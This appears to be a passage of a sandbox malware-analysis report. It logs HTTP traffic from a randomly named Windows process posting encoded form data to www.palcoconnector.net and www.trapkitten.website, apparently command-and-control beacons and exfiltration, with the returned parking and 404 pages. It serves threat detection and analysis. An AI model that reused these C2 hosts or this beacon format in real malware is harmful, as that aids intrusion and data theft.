                      Sep 22, 2024 18:03:38.236916065 CEST778OUTPOST /c45k/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.palcoconnector.net
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.palcoconnector.net
                      Referer: http://www.palcoconnector.net/c45k/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 35 2b 42 4e 66 51 39 43 32 46 54 44 36 4f 6e 75 35 74 4c 6d 32 47 4f 6c 65 33 78 71 30 41 46 42 59 65 51 44 2b 4b 33 67 6a 70 54 42 55 6c 53 68 75 61 45 76 67 51 4c 56 61 50 41 32 55 52 68 75 6c 58 48 4e 67 4f 35 79 35 43 70 41 77 61 69 2b 62 45 4f 7a 2b 47 32 59 41 6f 70 34 66 32 78 78 46 76 49 4c 44 64 72 30 51 6d 4c 53 4c 4b 33 2f 2f 6e 49 45 4b 54 75 69 57 36 2f 42 33 76 65 53 71 78 6e 6b 67 7a 4a 70 62 31 2b 45 61 4d 35 35 4f 71 4a 51 4c 78 56 52 4b 78 49 70 36 7a 6c 76 43 6e 39 4d 56 4f 4d 52 5a 6b 2b 41 43 49 32 4a 48 50 41 36 69 75 74 67 69 71 65 33 41 42 63 6f 2b 67 6e 71 59 4b 32 75 31 67 39 6b 45 62 6c 73 59 50 56 6b 4a 32 41 3d
                      Data Ascii: 4rl8h=5+BNfQ9C2FTD6Onu5tLm2GOle3xq0AFBYeQD+K3gjpTBUlShuaEvgQLVaPA2URhulXHNgO5y5CpAwai+bEOz+G2YAop4f2xxFvILDdr0QmLSLK3//nIEKTuiW6/B3veSqxnkgzJpb1+EaM55OqJQLxVRKxIp6zlvCn9MVOMRZk+ACI2JHPA6iutgiqe3ABco+gnqYK2u1g9kEblsYPVkJ2A=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.449756208.91.197.27801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:40.783293962 CEST10860OUTPOST /c45k/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.palcoconnector.net
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.palcoconnector.net
                      Referer: http://www.palcoconnector.net/c45k/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 35 2b 42 4e 66 51 39 43 32 46 54 44 36 4f 6e 75 35 74 4c 6d 32 47 4f 6c 65 33 78 71 30 41 46 42 59 65 51 44 2b 4b 33 67 6a 70 4c 42 58 57 61 68 76 35 63 76 6a 51 4c 56 5a 50 41 31 55 52 68 4a 6c 58 75 46 67 4c 68 69 35 42 52 41 79 35 61 2b 53 52 69 7a 33 47 32 59 43 6f 70 35 52 57 78 65 46 76 59 48 44 63 62 30 51 6d 4c 53 4c 4a 2f 2f 37 32 49 45 49 54 75 6a 54 36 2f 56 36 50 65 71 71 78 2f 53 67 7a 4d 57 62 45 65 45 66 63 70 35 44 34 52 51 44 78 56 70 4c 42 49 68 36 79 5a 77 43 6e 52 71 56 4f 34 76 5a 6d 69 41 47 66 44 4e 51 4e 4e 69 38 73 78 4f 32 34 75 6a 45 6a 77 76 2b 67 43 54 66 71 37 75 6f 67 6c 59 4a 35 63 59 48 4e 42 59 61 7a 49 41 36 2b 70 35 45 2f 58 56 42 64 42 41 6d 48 38 42 4d 6b 62 64 72 2b 62 67 76 70 4a 6d 7a 42 67 72 67 57 33 64 4a 6c 43 78 59 4d 31 56 63 6d 6f 62 74 41 6b 7a 78 41 38 4c 49 77 65 54 44 31 7a 6f 47 6c 65 4f 49 6c 49 73 6c 37 51 65 30 49 65 4b 34 6c 79 6f 51 32 65 71 71 2f 48 39 62 63 77 69 47 37 43 58 66 7a 59 32 45 54 31 49 7a 48 74 53 6a 71 46 39 [TRUNCATED]
                      Data Ascii: 4rl8h=5+BNfQ9C2FTD6Onu5tLm2GOle3xq0AFBYeQD+K3gjpLBXWahv5cvjQLVZPA1URhJlXuFgLhi5BRAy5a+SRiz3G2YCop5RWxeFvYHDcb0QmLSLJ//72IEITujT6/V6Peqqx/SgzMWbEeEfcp5D4RQDxVpLBIh6yZwCnRqVO4vZmiAGfDNQNNi8sxO24ujEjwv+gCTfq7uoglYJ5cYHNBYazIA6+p5E/XVBdBAmH8BMkbdr+bgvpJmzBgrgW3dJlCxYM1VcmobtAkzxA8LIweTD1zoGleOIlIsl7Qe0IeK4lyoQ2eqq/H9bcwiG7CXfzY2ET1IzHtSjqF9JsX4VRJ0q/YtSBqjsExG6VSv96tBhDX4blErAQG37MLub11nImkdEJ8ge2RA/PWwr/byL7LMvikCvhxeYFM94sjkwU4STmVF1y2L4w3FONqM7DEPR8bEzSK8VRpIbjr7aFN4SYyqeKiUSbfNOCW7bA2qK9/02yvTVlb9MAAFaLQPQ+8/sbpQsxtenmO+kfdPjnYD9RbAzQcrzrRxd9fSIhIfdx+Irkhmh69TCGN6klxc0Izs6aA/Dn8/j8u/kXvnJ46vu0am89ShmeH5Tcswd0IlUPh/fSfXjPO7qV/d++LLnKHv3oOuaBpvGRn0tObsSvFgEun+1gooIv3BJyoMbxeuE4OpNt+To7xYOjXulKkrYtxKQrSroNt9KBvvYYtwpFjmHwQrwOe0xtYJ/qo7MVVmcGD+PVZ9sNi4h5z21L3kRjEZ5qteGBt16MvoGJei/L7c9k45VMZTYlMZhst2uX1LX/jF310dai24TAb5MpiZxfupUzSXZIVoelxEKPe1AS5R8s9FIM7doAVZHrhVscO6x6oWBx+ah2zAPeoSjB1feHmpQ9LZ1rgxGoG5M3Lq5sXRX8AJp0OMt5daZ8g1rRYq6anIiQjK4g+uVVtYIQINQIf6c6DneOz0AaYZJcQ5sZb9dvC0wbVhzv1qJTw6jDDh7vKwqLWOZA [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.449757208.91.197.27801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:43.325685978 CEST484OUTGET /c45k/?4rl8h=08ptcl9k6k3Clc+jjfTphEeOe2lz7AEUYr4PirX9ycnlRkqnpIEJhgCFSf5hEjt7uErMgv9wtAp1yqXhXhWRgW+nHLlYanRICP4JCJqgUGT9OLnA1kIzPD4=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.palcoconnector.net
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:03:59.826951027 CEST1236INHTTP/1.1 200 OK
                      Date: Sun, 22 Sep 2024 16:03:43 GMT
                      Server: Apache
                      Referrer-Policy: no-referrer-when-downgrade
                      Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                      Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                      Set-Cookie: vsid=907vr4745666393233509; expires=Fri, 21-Sep-2029 16:03:59 GMT; Max-Age=157680000; path=/; domain=www.palcoconnector.net; HttpOnly
                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_SMLFVwmDFabq4t0j70zhF2EMjLk0ddPhHRvelr3FRFUiq5rP4+hLl/hQVu4PXgzlOpWmr4MY/fxvNM0of78tfA==
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      Data Raw: 62 38 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22
                      Data Ascii: b8a0<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"
                      Sep 22, 2024 18:03:59.827187061 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69
                      Data Ascii: > <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in
                      Sep 22, 2024 18:03:59.827228069 CEST1236INData Raw: 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22
                      Data Ascii: on(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages
                      Sep 22, 2024 18:03:59.827982903 CEST1236INData Raw: 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67
                      Data Ascii: ages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.s
                      Sep 22, 2024 18:03:59.828035116 CEST1236INData Raw: 2e 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28
                      Data Ascii: .cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{
                      Sep 22, 2024 18:03:59.828921080 CEST694INData Raw: 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70 6c 61
                      Data Ascii: ){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribu
                      Sep 22, 2024 18:03:59.869522095 CEST1236INData Raw: 3d 62 2e 73 75 62 73 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29 7b
                      Data Ascii: =b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"
                      Sep 22, 2024 18:03:59.869647980 CEST1236INData Raw: 70 2e 6c 61 73 74 49 64 3b 5f 5f 67 70 70 2e 65 2e 70 75 73 68 28 7b 69 64 3a 63 2c 63 61 6c 6c 62 61 63 6b 3a 66 7d 29 3b 72 65 74 75 72 6e 7b 65 76 65 6e 74 4e 61 6d 65 3a 22 6c 69 73 74 65 6e 65 72 52 65 67 69 73 74 65 72 65 64 22 2c 6c 69 73
                      Data Ascii: p.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp
                      Sep 22, 2024 18:03:59.869688034 CEST448INData Raw: 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 74 63 66 61 70 69 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 74 63 66 61 70 69 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e 5f
                      Data Ascii: typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.par
                      Sep 22, 2024 18:03:59.870237112 CEST1236INData Raw: 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 2c 22 70 61 72 61 6d 65 74 65 72 22 20 69 6e 20 62 3f 62 2e 70 61 72 61 6d 65 74 65 72 3a 6e 75 6c 6c 2c 22 76 65 72 73 69 6f 6e 22 20 69 6e 20 62 3f 62 2e 76 65 72 73 69 6f 6e 3a 31
                      Data Ascii: .stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!
                      Sep 22, 2024 18:03:59.870275974 CEST1236INData Raw: 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 47 70 70 53 74 75 62 28 22 5f 5f 67 70 70 22 29 7d 3b 3c 2f 73 63
                      Data Ascii: sablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.palcoconnector.net/px.js?ch=1"></script><script type="text/ja


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.449758195.161.68.8801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:04:10.490864038 CEST758OUTPOST /0dae/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.trapkitten.website
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.trapkitten.website
                      Referer: http://www.trapkitten.website/0dae/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 75 56 6c 33 76 43 43 30 56 39 30 30 71 34 32 56 4b 47 77 34 65 42 58 35 41 4e 74 63 43 68 6e 51 47 41 71 7a 70 39 6e 74 4e 62 35 63 54 48 36 6f 6a 6f 38 63 2f 76 69 57 78 35 73 50 6b 4f 54 67 42 6b 6d 46 51 78 48 52 49 73 4b 2f 71 65 4c 70 67 58 41 64 57 68 45 66 6f 65 63 59 49 54 70 44 51 46 54 44 4c 56 4c 77 39 76 31 34 73 42 69 65 6e 45 52 2b 33 32 44 31 57 76 36 4a 74 4f 48 66 7a 59 30 4b 37 58 5a 4e 70 45 76 73 69 37 45 2b 58 75 52 66 6e 33 6c 43 48 42 72 70 49 42 78 48 30 6f 48 2b 38 65 34 4b 72 55 77 64 36 2f 64 75 64 37 46 6c 44 47 64 42 70 74 79 38 5a 4a 6f 64 6a 51 3d 3d
                      Data Ascii: 4rl8h=uVl3vCC0V900q42VKGw4eBX5ANtcChnQGAqzp9ntNb5cTH6ojo8c/viWx5sPkOTgBkmFQxHRIsK/qeLpgXAdWhEfoecYITpDQFTDLVLw9v14sBienER+32D1Wv6JtOHfzY0K7XZNpEvsi7E+XuRfn3lCHBrpIBxH0oH+8e4KrUwd6/dud7FlDGdBpty8ZJodjQ==
                      Sep 22, 2024 18:04:11.273576975 CEST778INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:04:11 GMT
                      Content-Type: text/html
                      Content-Length: 634
                      Connection: close
                      Server: Apache
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.449759195.161.68.8801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:04:13.046003103 CEST778OUTPOST /0dae/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.trapkitten.website
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.trapkitten.website
                      Referer: http://www.trapkitten.website/0dae/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 75 56 6c 33 76 43 43 30 56 39 30 30 71 5a 6d 56 48 42 4d 34 4a 78 58 36 5a 4e 74 63 49 42 6d 62 47 41 6d 7a 70 2f 4c 44 4e 74 4a 63 54 6d 4b 6f 69 70 38 63 2b 76 69 57 32 4a 73 4b 70 75 54 33 42 6b 71 4e 51 78 37 52 49 74 75 2f 71 61 50 70 68 67 55 61 58 78 46 35 67 2b 63 61 46 7a 70 44 51 46 54 44 4c 55 75 6c 39 76 74 34 73 79 36 65 6c 6c 52 2f 70 47 44 36 58 76 36 4a 38 2b 47 55 7a 59 30 6b 37 56 39 6a 70 43 7a 73 69 35 4d 2b 58 66 52 59 79 48 6c 45 4b 68 71 69 46 44 4d 51 37 62 2b 55 31 2f 59 57 73 45 6b 76 79 5a 4d 30 4d 4b 6b 79 52 47 35 79 30 71 37 49 55 4b 56 55 34 57 6e 6c 30 4a 51 43 75 63 61 51 7a 6f 46 47 30 34 43 35 4f 50 77 3d
                      Data Ascii: 4rl8h=uVl3vCC0V900qZmVHBM4JxX6ZNtcIBmbGAmzp/LDNtJcTmKoip8c+viW2JsKpuT3BkqNQx7RItu/qaPphgUaXxF5g+caFzpDQFTDLUul9vt4sy6ellR/pGD6Xv6J8+GUzY0k7V9jpCzsi5M+XfRYyHlEKhqiFDMQ7b+U1/YWsEkvyZM0MKkyRG5y0q7IUKVU4Wnl0JQCucaQzoFG04C5OPw=
                      Sep 22, 2024 18:04:13.853189945 CEST778INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:04:13 GMT
                      Content-Type: text/html
                      Content-Length: 634
                      Connection: close
                      Server: Apache
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.449760195.161.68.8801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:04:15.598016024 CEST10860OUTPOST /0dae/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.trapkitten.website
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.trapkitten.website
                      Referer: http://www.trapkitten.website/0dae/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 75 56 6c 33 76 43 43 30 56 39 30 30 71 5a 6d 56 48 42 4d 34 4a 78 58 36 5a 4e 74 63 49 42 6d 62 47 41 6d 7a 70 2f 4c 44 4e 75 70 63 54 55 75 6f 6a 4b 45 63 73 2f 69 57 31 4a 73 4c 70 75 53 31 42 6b 69 4a 51 78 32 6b 49 76 6d 2f 73 50 62 70 78 45 34 61 64 78 46 35 69 2b 63 62 49 54 70 57 51 46 6a 48 4c 55 2b 6c 39 76 74 34 73 33 32 65 32 55 52 2f 72 47 44 31 57 76 36 56 74 4f 48 7a 7a 59 73 53 37 56 35 64 75 30 44 73 69 5a 63 2b 56 4a 6c 59 75 58 6c 47 4e 68 71 78 46 44 42 58 37 62 69 79 31 2f 73 73 73 47 34 76 32 38 52 33 65 61 39 70 4e 45 74 67 32 37 76 74 62 70 5a 70 67 55 2f 79 6c 71 4a 5a 73 4f 62 69 7a 76 67 6a 6b 62 48 34 4e 35 50 53 38 32 43 64 54 76 61 57 65 42 77 64 78 4e 74 34 69 52 58 2f 56 56 76 47 73 69 75 74 58 30 4a 32 68 58 6b 4d 73 38 36 4d 57 31 76 6a 39 4e 7a 42 54 31 4c 56 58 33 54 2f 39 31 43 4a 53 49 4f 6a 51 62 45 31 4a 56 46 63 62 6a 2f 6f 35 6c 74 54 2f 62 30 61 36 32 73 7a 57 67 78 50 65 4a 52 38 61 66 66 42 64 51 67 39 4d 34 36 38 34 54 6a 34 4f 4e 57 44 [TRUNCATED]
